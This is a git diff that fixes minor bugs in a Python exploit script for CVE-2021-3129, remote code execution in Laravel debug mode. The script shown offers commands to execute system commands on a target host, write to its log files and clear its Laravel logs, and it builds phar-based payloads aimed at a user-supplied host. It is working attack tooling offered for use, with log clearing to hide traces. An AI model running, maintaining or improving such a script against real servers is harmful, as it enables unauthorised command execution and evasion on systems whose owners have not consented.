diff --git a/CVE-2021-3129.py b/CVE-2021-3129.py index b375f4b..efa3d57 100644 --- a/CVE-2021-3129.py +++ b/CVE-2021-3129.py @@ -54,7 +54,7 @@ def ask_command(self): self.cmd_clear_logs() elif response[0:7] == "execute": self.cmd_execute_cmd(response[8:]) - elif response[0:7] == "write": + elif response[0:5] == "write": self.cmd_execute_write(response[6:]) else: print(RED + f"[!] No command found named \"{response}\".") @@ -67,7 +67,7 @@ def cmd_help(self): print(DARKCYAN + " help - Shows available commands.") print(DARKCYAN + " clear_logs - Clears Laravel logs.") print(DARKCYAN + " execute - Execute system command.") - print(DARKCYAN + " write - Write to log file.") + print(DARKCYAN + " write - Write to log file.") def cmd_clear_logs(self): print(DARKCYAN + f"[@] Clearing Laravel logs...") @@ -205,7 +205,8 @@ def generate_payload(self, command: str, padding=0) -> str: payload = 'A' * padding + payload payload = payload.replace("\n", "") + "A" - os.unlink("./tmp.phar") + if os.path.exists('./tmp.phar'): + os.unlink("./tmp.phar") print(GREEN + f"[√] Generated payload.") return payload @@ -216,7 +217,6 @@ def generate_write_payload(self, text: str, padding=0) -> str: payload = base64.b64encode(text.encode()).decode().rstrip('=') payload = ''.join(c + '=00' for c in payload) payload = 'A' * padding + payload - os.unlink("./tmp.phar") print(GREEN + f"[√] Generated payload.") return payload @@ -319,7 +319,7 @@ def find_laravel_version(self, content: str): if __name__ == "__main__": print(PURPLE + BOLD + "Laravel Debug Mode CVE script") - print(END + PURPLE + "[•] Made by: https://jvdpoll.nl" + RED) + print(END + PURPLE + "[•] Made by: https://github.com/joshuavanderpoll/CVE-2021-3129" + RED) parser = argparse.ArgumentParser(description='Exploit CVE-2021-3129 - Laravel vulnerability exploit script') parser.add_argument('--host', help='Host URL to use exploit on', required=True)